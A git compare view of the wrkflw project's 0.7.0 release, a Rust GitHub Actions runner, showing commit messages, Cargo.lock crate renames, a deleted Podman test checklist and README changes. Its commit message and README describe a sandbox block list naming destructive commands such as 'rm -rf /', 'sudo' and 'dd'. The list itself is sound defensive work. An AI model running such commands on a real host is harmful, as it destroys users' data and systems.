Compare commits

...

24 Commits

Author SHA1 Message Date
bahdotsh
960f7486a2 Release 0.7.0
wrkflw@0.7.0
wrkflw-evaluator@0.7.0
wrkflw-executor@0.7.0
wrkflw-github@0.7.0
wrkflw-gitlab@0.7.0
wrkflw-logging@0.7.0
wrkflw-matrix@0.7.0
wrkflw-models@0.7.0
wrkflw-parser@0.7.0
wrkflw-runtime@0.7.0
wrkflw-ui@0.7.0
wrkflw-utils@0.7.0
wrkflw-validators@0.7.0

Generated by cargo-workspaces
2025-08-13 18:07:11 +05:30
bahdotsh
cb936cd1af updated publish script 2025-08-13 17:57:44 +05:30
Gokul
625b8111f1 Merge pull request #38 from bahdotsh/improve-tui-help-tab
feat(ui): enhance TUI help tab with comprehensive documentation and s…
2025-08-13 15:29:22 +05:30
bahdotsh
b2b6e9e08d formatted 2025-08-13 15:26:08 +05:30
bahdotsh
86660ae573 feat(ui): enhance TUI help tab with comprehensive documentation and scrolling
- Add comprehensive keyboard shortcut documentation organized in sections
- Implement two-column layout with color-coded sections and emoji icons
- Add scrollable help content with ↑/↓ and k/j key support
- Enhance help overlay with larger modal size and scroll support
- Include detailed explanations of all tabs, runtime modes, and features
- Update status bar with context-aware help instructions
- Add help scroll state management to app state
- Document workflow management, search functionality, and best practices

The help tab now provides a complete guide covering:
- Navigation controls and tab switching
- Workflow selection, execution, and triggering
- Runtime modes (Docker, Podman, Emulation, Secure Emulation)
- Log search and filtering capabilities
- Tab-specific functionality and tips
- Quick actions and keyboard shortcuts
2025-08-13 14:52:10 +05:30
Gokul
886c415fa7 Merge pull request #37 from bahdotsh/feature/secure-emulation-sandboxing
feat: Add comprehensive sandboxing for secure emulation mode
2025-08-13 14:36:02 +05:30
bahdotsh
460357d9fe feat: Add comprehensive sandboxing for secure emulation mode
Security Features:
- Implement secure emulation runtime with command sandboxing
- Add command validation, filtering, and dangerous pattern detection
- Block harmful commands like 'rm -rf /', 'sudo', 'dd', etc.
- Add resource limits (CPU, memory, execution time, process count)
- Implement filesystem isolation and access controls
- Add environment variable sanitization
- Support shell operators (&&, ||, |, ;) with proper parsing

New Runtime Mode:
- Add 'secure-emulation' runtime option to CLI
- Update UI to support new runtime mode with green security indicator
- Mark legacy 'emulation' mode as unsafe in help text
- Default to secure mode for local development safety

Documentation:
- Create comprehensive security documentation (README_SECURITY.md)
- Update main README with security mode information
- Add example workflows demonstrating safe vs dangerous commands
- Include migration guide and best practices

Testing:
- Add comprehensive test suite for sandbox functionality
- Include security demo workflows for testing
- Test dangerous command blocking and safe command execution
- Verify resource limits and timeout functionality

Code Quality:
- Fix all clippy warnings with proper struct initialization
- Add proper error handling and user-friendly security messages
- Implement comprehensive logging for security events
- Follow Rust best practices throughout

This addresses security concerns by preventing accidental harmful
commands while maintaining full compatibility with legitimate CI/CD
workflows. Users can now safely run untrusted workflows locally
without risk to their host system.
2025-08-13 14:30:51 +05:30
Gokul
096ccfa180 Merge pull request #36 from bahdotsh/feat/validate-multiple-paths
feat(cli): wrkflw validate accepts multiple paths (files/dirs)
2025-08-13 14:11:09 +05:30
bahdotsh
8765537cfa feat(cli): wrkflw validate accepts multiple paths (files/dirs); autodetects GitHub/GitLab per file; --gitlab forces GitLab for all; graceful EPIPE handling when piped; docs updated 2025-08-13 14:06:40 +05:30
Gokul
ac708902ef Merge pull request #35 from bahdotsh/feature/async-log-processing
feat: move log stream composition and filtering to background thread
2025-08-13 13:41:18 +05:30
bahdotsh
d1268d55cf feat: move log stream composition and filtering to background thread
- Resolves #29: UI unresponsiveness in logs tab
- Add LogProcessor with background thread for async log processing
- Implement pre-processed log caching with ProcessedLogEntry
- Replace frame-by-frame log processing with cached results
- Add automatic log change detection for app and system logs
- Optimize rendering from O(n) to O(1) complexity
- Maintain all search, filter, and highlighting functionality
- Fix clippy warning for redundant pattern matching

Performance improvements:
- Log processing moved to separate thread with 50ms debouncing
- UI rendering no longer blocks on log filtering/formatting
- Supports thousands of logs without UI lag
- Non-blocking request/response pattern with mpsc channels
2025-08-13 13:38:17 +05:30
Gokul
a146d94c35 Merge pull request #34 from bahdotsh/fix/runs-on-array-support
fix: Support array format for runs-on field in GitHub Actions workflows
2025-08-13 13:24:35 +05:30
bahdotsh
7636195380 fix: Support array format for runs-on field in GitHub Actions workflows
- Add custom deserializer for runs-on field to handle both string and array formats
- Update Job struct to use Vec<String> instead of String for runs-on field
- Modify executor to extract first element from runs-on array for runner selection
- Add test workflow to verify both string and array formats work correctly
- Maintain backwards compatibility with existing string-based workflows

Fixes issue where workflows with runs-on: [self-hosted, ubuntu, small] format
would fail with 'invalid type: sequence, expected a string' error.

This change aligns with GitHub Actions specification which supports:
- String format: runs-on: ubuntu-latest
- Array format: runs-on: [self-hosted, ubuntu, small]
2025-08-13 13:21:58 +05:30
Gokul
98afdb3372 Merge pull request #33 from bahdotsh/docs/add-crate-readmes
docs(readme): add per-crate READMEs and enhance wrkflw crate README
2025-08-12 15:12:44 +05:30
bahdotsh
58de01e69f docs(readme): add per-crate READMEs and enhance wrkflw crate README 2025-08-12 15:09:38 +05:30
Gokul
880cae3899 Merge pull request #32 from bahdotsh/bahdotsh/reusable-workflow-execution
feat: add execution support for reusable workflows
2025-08-12 14:57:49 +05:30
bahdotsh
66e540645d feat(executor,parser,docs): add execution support for reusable workflows (jobs.<id>.uses)\n\n- Parser: make jobs.runs-on optional; add job-level uses/with/secrets for caller jobs\n- Executor: resolve and run local/remote called workflows; propagate inputs/secrets; summarize results\n- Docs: document feature, usage, and current limits in README\n- Tests: add execution tests for local reusable workflows (success/failure)\n\nLimits:\n- Does not propagate outputs back to caller\n- secrets: inherit not special-cased; use mapping\n- Remote private repos not yet supported; public only\n- Cycle detection for nested calls unchanged 2025-08-12 14:53:07 +05:30
bahdotsh
79b6389f54 fix: resolve schema file path issues for cargo publish
- Copied schema files into parser crate src directory
- Updated include_str! paths to be relative to source files
- Ensures schemas are bundled with crate during publish
- Resolves packaging and verification issues during publication

Fixes the build error that was preventing crate publication.
2025-08-09 18:14:25 +05:30
bahdotsh
5d55812872 fix: correct schema file paths for cargo publish
- Updated include_str! paths from ../../../ to ../../../../
- This resolves packaging issues during cargo publish
- Fixes schema loading for parser crate publication
2025-08-09 18:12:56 +05:30
bahdotsh
537bf2f9d1 chore: bump version to 0.6.0
- Updated workspace version from 0.5.0 to 0.6.0
- Updated all internal crate dependencies to 0.6.0
- Verified all tests pass and builds succeed
2025-08-09 17:46:09 +05:30
bahdotsh
f0b6633cb8 renamed 2025-08-09 17:03:03 +05:30
bahdotsh
181b5c5463 feat: reorganize test files and delete manual test checklist
- Move test workflows to tests/workflows/
- Move GitLab CI fixtures to tests/fixtures/gitlab-ci/
- Move test scripts to tests/scripts/
- Move Podman testing docs to tests/
- Update paths in test scripts and documentation
- Delete MANUAL_TEST_CHECKLIST.md as requested
- Update tests/README.md to reflect new organization
2025-08-09 15:30:53 +05:30
bahdotsh
1cc3bf98b6 feat: bump version to 0.5.0 for podman support 2025-08-09 15:24:49 +05:30
Gokul
af8ac002e4 Merge pull request #28 from bahdotsh/podman
feat: Add comprehensive Podman container runtime support
2025-08-09 15:11:58 +05:30
104 changed files with 8968 additions and 1140 deletions

376
Cargo.lock generated
View File

@@ -486,46 +486,6 @@ dependencies = [
"windows-sys 0.59.0",
]
[[package]]
name = "evaluator"
version = "0.4.0"
dependencies = [
"colored",
"models",
"serde_yaml",
"validators",
]
[[package]]
name = "executor"
version = "0.4.0"
dependencies = [
"async-trait",
"bollard",
"chrono",
"dirs",
"futures",
"futures-util",
"lazy_static",
"logging",
"matrix",
"models",
"num_cpus",
"once_cell",
"parser",
"regex",
"runtime",
"serde",
"serde_json",
"serde_yaml",
"tar",
"tempfile",
"thiserror",
"tokio",
"utils",
"uuid",
]
[[package]]
name = "fancy-regex"
version = "0.11.0"
@@ -714,35 +674,6 @@ version = "0.31.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "07e28edb80900c19c28f1072f2e8aeca7fa06b23cd4169cefe1af5aa3260783f"
[[package]]
name = "github"
version = "0.4.0"
dependencies = [
"lazy_static",
"models",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
]
[[package]]
name = "gitlab"
version = "0.4.0"
dependencies = [
"lazy_static",
"models",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
"urlencoding",
]
[[package]]
name = "h2"
version = "0.3.26"
@@ -1215,28 +1146,6 @@ version = "0.4.27"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "13dc2df351e3202783a1fe0d44375f7295ffb4049267b0f3018346dc122a1d94"
[[package]]
name = "logging"
version = "0.4.0"
dependencies = [
"chrono",
"models",
"once_cell",
"serde",
"serde_yaml",
]
[[package]]
name = "matrix"
version = "0.4.0"
dependencies = [
"indexmap 2.8.0",
"models",
"serde",
"serde_yaml",
"thiserror",
]
[[package]]
name = "memchr"
version = "2.7.4"
@@ -1281,16 +1190,6 @@ dependencies = [
"windows-sys 0.52.0",
]
[[package]]
name = "models"
version = "0.4.0"
dependencies = [
"serde",
"serde_json",
"serde_yaml",
"thiserror",
]
[[package]]
name = "native-tls"
version = "0.2.14"
@@ -1511,20 +1410,6 @@ dependencies = [
"windows-targets 0.52.6",
]
[[package]]
name = "parser"
version = "0.4.0"
dependencies = [
"jsonschema",
"matrix",
"models",
"serde",
"serde_json",
"serde_yaml",
"tempfile",
"thiserror",
]
[[package]]
name = "paste"
version = "1.0.15"
@@ -1731,23 +1616,6 @@ dependencies = [
"winreg",
]
[[package]]
name = "runtime"
version = "0.4.0"
dependencies = [
"async-trait",
"futures",
"logging",
"models",
"once_cell",
"serde",
"serde_yaml",
"tempfile",
"tokio",
"utils",
"which",
]
[[package]]
name = "rustc-demangle"
version = "0.1.24"
@@ -2243,28 +2111,6 @@ version = "0.2.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
[[package]]
name = "ui"
version = "0.4.0"
dependencies = [
"chrono",
"crossterm 0.26.1",
"evaluator",
"executor",
"futures",
"github",
"logging",
"models",
"ratatui",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"tokio",
"utils",
]
[[package]]
name = "unicode-ident"
version = "1.0.18"
@@ -2324,16 +2170,6 @@ version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821"
[[package]]
name = "utils"
version = "0.4.0"
dependencies = [
"models",
"nix",
"serde",
"serde_yaml",
]
[[package]]
name = "uuid"
version = "1.16.0"
@@ -2343,16 +2179,6 @@ dependencies = [
"getrandom 0.3.2",
]
[[package]]
name = "validators"
version = "0.4.0"
dependencies = [
"matrix",
"models",
"serde",
"serde_yaml",
]
[[package]]
name = "vcpkg"
version = "0.2.15"
@@ -2719,7 +2545,7 @@ checksum = "1e9df38ee2d2c3c5948ea468a8406ff0db0b29ae1ffde1bcf20ef305bcc95c51"
[[package]]
name = "wrkflw"
version = "0.4.0"
version = "0.7.0"
dependencies = [
"bollard",
"chrono",
@@ -2727,41 +2553,217 @@ dependencies = [
"colored",
"crossterm 0.26.1",
"dirs",
"evaluator",
"executor",
"futures",
"futures-util",
"github",
"gitlab",
"indexmap 2.8.0",
"itertools",
"lazy_static",
"libc",
"log",
"logging",
"matrix",
"models",
"nix",
"num_cpus",
"once_cell",
"parser",
"ratatui",
"rayon",
"regex",
"reqwest",
"runtime",
"serde",
"serde_json",
"serde_yaml",
"tempfile",
"thiserror",
"tokio",
"ui",
"urlencoding",
"utils",
"uuid",
"validators",
"walkdir",
"wrkflw-evaluator",
"wrkflw-executor",
"wrkflw-github",
"wrkflw-gitlab",
"wrkflw-logging",
"wrkflw-matrix",
"wrkflw-models",
"wrkflw-parser",
"wrkflw-runtime",
"wrkflw-ui",
"wrkflw-utils",
"wrkflw-validators",
]
[[package]]
name = "wrkflw-evaluator"
version = "0.7.0"
dependencies = [
"colored",
"serde_yaml",
"wrkflw-models",
"wrkflw-validators",
]
[[package]]
name = "wrkflw-executor"
version = "0.7.0"
dependencies = [
"async-trait",
"bollard",
"chrono",
"dirs",
"futures",
"futures-util",
"lazy_static",
"num_cpus",
"once_cell",
"regex",
"serde",
"serde_json",
"serde_yaml",
"tar",
"tempfile",
"thiserror",
"tokio",
"uuid",
"wrkflw-logging",
"wrkflw-matrix",
"wrkflw-models",
"wrkflw-parser",
"wrkflw-runtime",
"wrkflw-utils",
]
[[package]]
name = "wrkflw-github"
version = "0.7.0"
dependencies = [
"lazy_static",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
"wrkflw-models",
]
[[package]]
name = "wrkflw-gitlab"
version = "0.7.0"
dependencies = [
"lazy_static",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"thiserror",
"urlencoding",
"wrkflw-models",
]
[[package]]
name = "wrkflw-logging"
version = "0.7.0"
dependencies = [
"chrono",
"once_cell",
"serde",
"serde_yaml",
"wrkflw-models",
]
[[package]]
name = "wrkflw-matrix"
version = "0.7.0"
dependencies = [
"indexmap 2.8.0",
"serde",
"serde_yaml",
"thiserror",
"wrkflw-models",
]
[[package]]
name = "wrkflw-models"
version = "0.7.0"
dependencies = [
"serde",
"serde_json",
"serde_yaml",
"thiserror",
]
[[package]]
name = "wrkflw-parser"
version = "0.7.0"
dependencies = [
"jsonschema",
"serde",
"serde_json",
"serde_yaml",
"tempfile",
"thiserror",
"wrkflw-matrix",
"wrkflw-models",
]
[[package]]
name = "wrkflw-runtime"
version = "0.7.0"
dependencies = [
"async-trait",
"futures",
"once_cell",
"regex",
"serde",
"serde_yaml",
"tempfile",
"thiserror",
"tokio",
"which",
"wrkflw-logging",
"wrkflw-models",
"wrkflw-utils",
]
[[package]]
name = "wrkflw-ui"
version = "0.7.0"
dependencies = [
"chrono",
"crossterm 0.26.1",
"futures",
"ratatui",
"regex",
"reqwest",
"serde",
"serde_json",
"serde_yaml",
"tokio",
"wrkflw-evaluator",
"wrkflw-executor",
"wrkflw-github",
"wrkflw-logging",
"wrkflw-models",
"wrkflw-utils",
]
[[package]]
name = "wrkflw-utils"
version = "0.7.0"
dependencies = [
"nix",
"serde",
"serde_yaml",
"wrkflw-models",
]
[[package]]
name = "wrkflw-validators"
version = "0.7.0"
dependencies = [
"serde",
"serde_yaml",
"wrkflw-matrix",
"wrkflw-models",
]
[[package]]

View File

@@ -5,7 +5,7 @@ members = [
resolver = "2"
[workspace.package]
version = "0.4.0"
version = "0.7.0"
edition = "2021"
description = "A GitHub Actions workflow validator and executor"
documentation = "https://github.com/bahdotsh/wrkflw"

View File

@@ -1,207 +0,0 @@
# Manual Testing Checklist for Podman Support
## Quick Manual Verification Steps
### ✅ **Step 1: CLI Help and Options**
```bash
./target/release/wrkflw run --help
```
**Verify:**
- [ ] `--runtime` option is present
- [ ] Shows `docker`, `podman`, `emulation` as possible values
- [ ] Default is `docker`
- [ ] Help text explains each option
### ✅ **Step 2: CLI Runtime Selection**
```bash
# Test each runtime option
./target/release/wrkflw run --runtime docker test-workflows/example.yml --verbose
./target/release/wrkflw run --runtime podman test-workflows/example.yml --verbose
./target/release/wrkflw run --runtime emulation test-workflows/example.yml --verbose
# Test invalid runtime (should fail)
./target/release/wrkflw run --runtime invalid test-workflows/example.yml
```
**Verify:**
- [ ] All valid runtimes are accepted
- [ ] Invalid runtime shows clear error message
- [ ] Podman mode shows "Podman: Running container" in verbose logs
- [ ] Emulation mode works without containers
### ✅ **Step 3: TUI Runtime Support**
```bash
./target/release/wrkflw tui test-workflows/
```
**Verify:**
- [ ] TUI starts successfully
- [ ] Status bar shows current runtime (bottom of screen)
- [ ] Press `e` key to cycle through runtimes: Docker → Podman → Emulation → Docker
- [ ] Runtime changes are reflected in status bar
- [ ] Podman shows "Connected" or "Not Available" status
### ✅ **Step 4: TUI Runtime Parameter**
```bash
./target/release/wrkflw tui --runtime podman test-workflows/
./target/release/wrkflw tui --runtime emulation test-workflows/
```
**Verify:**
- [ ] TUI starts with specified runtime
- [ ] Status bar reflects the specified runtime
### ✅ **Step 5: Container Execution Test**
Create a simple test workflow:
```yaml
name: Runtime Test
on: [workflow_dispatch]
jobs:
test:
runs-on: ubuntu-latest
container: ubuntu:20.04
steps:
- run: |
echo "Runtime test execution"
whoami
pwd
echo "Test completed"
```
Test with different runtimes:
```bash
./target/release/wrkflw run --runtime podman test-runtime.yml --verbose
./target/release/wrkflw run --runtime docker test-runtime.yml --verbose
./target/release/wrkflw run --runtime emulation test-runtime.yml --verbose
```
**Verify:**
- [ ] Podman mode runs in containers (shows container logs)
- [ ] Docker mode runs in containers (shows container logs)
- [ ] Emulation mode runs on host system
- [ ] All modes produce similar output
### ✅ **Step 6: Error Handling**
```bash
# Test with Podman unavailable (temporarily rename podman binary)
sudo mv /usr/local/bin/podman /usr/local/bin/podman.tmp 2>/dev/null || echo "podman not in /usr/local/bin"
./target/release/wrkflw run --runtime podman test-runtime.yml
sudo mv /usr/local/bin/podman.tmp /usr/local/bin/podman 2>/dev/null || echo "nothing to restore"
```
**Verify:**
- [ ] Shows "Podman is not available. Using emulation mode instead."
- [ ] Falls back to emulation gracefully
- [ ] Workflow still executes successfully
### ✅ **Step 7: Container Preservation**
```bash
# Create a failing workflow
echo 'name: Fail Test
on: [workflow_dispatch]
jobs:
fail:
runs-on: ubuntu-latest
container: ubuntu:20.04
steps:
- run: exit 1' > test-fail.yml
# Test with preservation
./target/release/wrkflw run --runtime podman --preserve-containers-on-failure test-fail.yml
# Check for preserved containers
podman ps -a --filter "name=wrkflw-"
```
**Verify:**
- [ ] Failed container is preserved when flag is used
- [ ] Container can be inspected with `podman exec -it <container> bash`
- [ ] Without flag, containers are cleaned up
### ✅ **Step 8: Documentation**
**Verify:**
- [ ] README.md mentions Podman support
- [ ] Examples show `--runtime podman` usage
- [ ] TUI keybind documentation mentions runtime cycling
- [ ] Installation instructions for Podman are present
## Platform-Specific Tests
### **Linux:**
- [ ] Podman works rootless
- [ ] No sudo required for container operations
- [ ] Network connectivity works in containers
### **macOS:**
- [ ] Podman machine is initialized and running
- [ ] Container execution works correctly
- [ ] Volume mounting works for workspace
### **Windows:**
- [ ] Podman Desktop or CLI is installed
- [ ] Basic container operations work
- [ ] Workspace mounting functions correctly
## Performance and Resource Tests
### **Memory Usage:**
```bash
# Monitor memory during execution
./target/release/wrkflw run --runtime podman test-runtime.yml &
PID=$!
while kill -0 $PID 2>/dev/null; do
ps -p $PID -o pid,ppid,pgid,sess,cmd,%mem,%cpu
sleep 2
done
```
**Verify:**
- [ ] Memory usage is reasonable
- [ ] No memory leaks during execution
### **Container Cleanup:**
```bash
# Run multiple workflows and check cleanup
for i in {1..3}; do
./target/release/wrkflw run --runtime podman test-runtime.yml
done
podman ps -a --filter "name=wrkflw-"
```
**Verify:**
- [ ] No containers remain after execution
- [ ] Cleanup is thorough and automatic
## Integration Tests
### **Complex Workflow:**
Test with a workflow that has:
- [ ] Multiple jobs
- [ ] Environment variables
- [ ] File operations
- [ ] Network access
- [ ] Package installation
### **Edge Cases:**
- [ ] Very long-running containers
- [ ] Large output logs
- [ ] Network-intensive operations
- [ ] File system intensive operations
## Final Verification
**Overall System Check:**
- [ ] All runtimes work as expected
- [ ] Error messages are clear and helpful
- [ ] Performance is acceptable
- [ ] User experience is smooth
- [ ] Documentation is accurate and complete
**Sign-off:**
- [ ] Basic functionality: ✅ PASS / ❌ FAIL
- [ ] CLI integration: ✅ PASS / ❌ FAIL
- [ ] TUI integration: ✅ PASS / ❌ FAIL
- [ ] Error handling: ✅ PASS / ❌ FAIL
- [ ] Documentation: ✅ PASS / ❌ FAIL
**Notes:**
_Add any specific issues, observations, or platform-specific notes here._
---
**Testing completed by:** ________________
**Date:** ________________
**Platform:** ________________
**Podman version:** ________________

View File

@@ -26,6 +26,7 @@ WRKFLW is a powerful command-line tool for validating and executing GitHub Actio
- Composite actions
- Local actions
- **Special Action Handling**: Native handling for commonly used actions like `actions/checkout`
- **Reusable Workflows (Caller Jobs)**: Execute jobs that call reusable workflows via `jobs.<id>.uses` (local path or `owner/repo/path@ref`)
- **Output Capturing**: View logs, step outputs, and execution details
- **Parallel Job Execution**: Runs independent jobs in parallel for faster workflow execution
- **Trigger Workflows Remotely**: Manually trigger workflow runs on GitHub or GitLab
@@ -110,6 +111,12 @@ wrkflw validate path/to/workflow.yml
# Validate workflows in a specific directory
wrkflw validate path/to/workflows
# Validate multiple files and/or directories (GitHub and GitLab are auto-detected)
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
# Force GitLab parsing for all provided paths
wrkflw validate --gitlab .gitlab-ci.yml other.gitlab-ci.yml
# Validate with verbose output
wrkflw validate --verbose path/to/workflow.yml
@@ -372,6 +379,7 @@ podman ps -a --filter "name=wrkflw-" --format "{{.Names}}" | xargs podman rm -f
- ✅ Composite actions (all composite actions, including nested and local composite actions, are supported)
- ✅ Local actions (actions referenced with local paths are supported)
- ✅ Special handling for common actions (e.g., `actions/checkout` is natively supported)
- ✅ Reusable workflows (caller): Jobs that use `jobs.<id>.uses` to call local or remote workflows are executed; inputs and secrets are propagated to the called workflow
- ✅ Workflow triggering via `workflow_dispatch` (manual triggering of workflows is supported)
- ✅ GitLab pipeline triggering (manual triggering of GitLab pipelines is supported)
- ✅ Environment files (`GITHUB_OUTPUT`, `GITHUB_ENV`, `GITHUB_PATH`, `GITHUB_STEP_SUMMARY` are fully supported)
@@ -395,23 +403,68 @@ podman ps -a --filter "name=wrkflw-" --format "{{.Names}}" | xargs podman rm -f
- ❌ Job/step timeouts: Custom timeouts for jobs and steps are NOT enforced.
- ❌ Job/step concurrency and cancellation: Features like `concurrency` and job cancellation are NOT supported.
- ❌ Expressions and advanced YAML features: Most common expressions are supported, but some advanced or edge-case expressions may not be fully implemented.
- ⚠️ Reusable workflows (limits):
- Outputs from called workflows are not propagated back to the caller (`needs.<id>.outputs.*` not supported)
- `secrets: inherit` is not special-cased; provide a mapping to pass secrets
- Remote calls clone public repos via HTTPS; private repos require preconfigured access (not yet implemented)
- Deeply nested reusable calls work but lack cycle detection beyond regular job dependency checks
## Reusable Workflows
WRKFLW supports executing reusable workflow caller jobs.
### Syntax
```yaml
jobs:
call-local:
uses: ./.github/workflows/shared.yml
call-remote:
uses: my-org/my-repo/.github/workflows/shared.yml@v1
with:
foo: bar
secrets:
token: ${{ secrets.MY_TOKEN }}
```
### Behavior
- Local references are resolved relative to the current working directory.
- Remote references are shallow-cloned at the specified `@ref` into a temporary directory.
- `with:` entries are exposed to the called workflow as environment variables `INPUT_<KEY>`.
- `secrets:` mapping entries are exposed as environment variables `SECRET_<KEY>`.
- The called workflow executes according to its own `jobs`/`needs`; a summary of its job results is reported as a single result for the caller job.
### Current limitations
- Outputs from called workflows are not surfaced back to the caller.
- `secrets: inherit` is not supported; specify an explicit mapping.
- Private repositories for remote `uses:` are not yet supported.
### Runtime Mode Differences
- **Docker Mode**: Provides the closest match to GitHub's environment, including support for Docker container actions, service containers, and Linux-based jobs. Some advanced container configurations may still require manual setup.
- **Podman Mode**: Similar to Docker mode but uses Podman for container execution. Offers rootless container support and enhanced security. Fully compatible with Docker-based workflows.
- **Emulation Mode**: Runs workflows using the local system tools. Limitations:
- **🔒 Secure Emulation Mode**: Runs workflows on the local system with comprehensive sandboxing for security. **Recommended for local development**:
- Command validation and filtering (blocks dangerous commands like `rm -rf /`, `sudo`, etc.)
- Resource limits (CPU, memory, execution time)
- Filesystem access controls
- Process monitoring and limits
- Safe for running untrusted workflows locally
- **⚠️ Emulation Mode (Legacy)**: Runs workflows using local system tools without sandboxing. **Not recommended - use Secure Emulation instead**:
- Only supports local and JavaScript actions (no Docker container actions)
- No support for service containers
- No caching support
- **No security protections - can execute harmful commands**
- Some actions may require adaptation to work locally
- Special action handling is more limited
### Best Practices
- Test workflows in both Docker and emulation modes to ensure compatibility
- **Use Secure Emulation mode for local development** - provides safety without container overhead
- Test workflows in multiple runtime modes to ensure compatibility
- **Use Docker/Podman mode for production** - provides maximum isolation and reproducibility
- Keep matrix builds reasonably sized for better performance
- Use environment variables instead of GitHub secrets when possible
- Consider using local actions for complex custom functionality
- Test network-dependent actions carefully in both modes
- **Review security warnings** - pay attention to blocked commands in secure emulation mode
- **Start with secure mode** - only fall back to legacy emulation if necessary
## Roadmap

View File

@@ -1,15 +1,20 @@
[package]
name = "evaluator"
name = "wrkflw-evaluator"
version.workspace = true
edition.workspace = true
description = "Workflow evaluation for wrkflw"
description = "Workflow evaluation functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
validators = { path = "../validators" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-validators = { path = "../validators", version = "0.7.0" }
# External dependencies
colored.workspace = true
serde_yaml.workspace = true
serde_yaml.workspace = true

View File

@@ -0,0 +1,29 @@
## wrkflw-evaluator
Small, focused helper for statically evaluating GitHub Actions workflow files.
- **Purpose**: Fast structural checks (e.g., `name`, `on`, `jobs`) before deeper validation/execution
- **Used by**: `wrkflw` CLI and TUI during validation flows
### Example
```rust
use std::path::Path;
let result = wrkflw_evaluator::evaluate_workflow_file(
Path::new(".github/workflows/ci.yml"),
/* verbose */ true,
).expect("evaluation failed");
if result.is_valid {
println!("Workflow looks structurally sound");
} else {
for issue in result.issues {
println!("- {}", issue);
}
}
```
### Notes
- This crate focuses on structural checks; deeper rules live in `wrkflw-validators`.
- Most consumers should prefer the top-level `wrkflw` CLI for end-to-end UX.

View File

@@ -3,8 +3,8 @@ use serde_yaml::{self, Value};
use std::fs;
use std::path::Path;
use models::ValidationResult;
use validators::{validate_jobs, validate_triggers};
use wrkflw_models::ValidationResult;
use wrkflw_validators::{validate_jobs, validate_triggers};
pub fn evaluate_workflow_file(path: &Path, verbose: bool) -> Result<ValidationResult, String> {
let content = fs::read_to_string(path).map_err(|e| format!("Failed to read file: {}", e))?;

View File

@@ -1,18 +1,23 @@
[package]
name = "executor"
name = "wrkflw-executor"
version.workspace = true
edition.workspace = true
description = "Workflow executor for wrkflw"
description = "Workflow execution engine for wrkflw"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
parser = { path = "../parser" }
runtime = { path = "../runtime" }
logging = { path = "../logging" }
matrix = { path = "../matrix" }
utils = { path = "../utils" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-parser = { path = "../parser", version = "0.7.0" }
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
# External dependencies
async-trait.workspace = true

29
crates/executor/README.md Normal file
View File

@@ -0,0 +1,29 @@
## wrkflw-executor
The execution engine that runs GitHub Actions workflows locally (Docker, Podman, or emulation).
- **Features**:
- Job graph execution with `needs` ordering and parallelism
- Docker/Podman container steps and emulation mode
- Basic environment/context wiring compatible with Actions
- **Used by**: `wrkflw` CLI and TUI
### API sketch
```rust
use wrkflw_executor::{execute_workflow, ExecutionConfig, RuntimeType};
let cfg = ExecutionConfig {
runtime: RuntimeType::Docker,
verbose: true,
preserve_containers_on_failure: false,
};
// Path to a workflow YAML
let workflow_path = std::path::Path::new(".github/workflows/ci.yml");
let result = execute_workflow(workflow_path, cfg).await?;
println!("workflow status: {:?}", result.summary_status);
```
Prefer using the `wrkflw` binary for a complete UX across validation, execution, and logs.

View File

@@ -1,5 +1,5 @@
use parser::workflow::WorkflowDefinition;
use std::collections::{HashMap, HashSet};
use wrkflw_parser::workflow::WorkflowDefinition;
pub fn resolve_dependencies(workflow: &WorkflowDefinition) -> Result<Vec<Vec<String>>, String> {
let jobs = &workflow.jobs;

View File

@@ -6,14 +6,14 @@ use bollard::{
Docker,
};
use futures_util::StreamExt;
use logging;
use once_cell::sync::Lazy;
use runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use std::collections::HashMap;
use std::path::Path;
use std::sync::Mutex;
use utils;
use utils::fd;
use wrkflw_logging;
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use wrkflw_utils;
use wrkflw_utils::fd;
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
static CREATED_NETWORKS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
@@ -50,7 +50,7 @@ impl DockerRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -62,7 +62,7 @@ impl DockerRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -72,7 +72,7 @@ impl DockerRuntime {
let image_keys = match CUSTOMIZED_IMAGES.lock() {
Ok(keys) => keys,
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
return None;
}
};
@@ -107,7 +107,7 @@ impl DockerRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
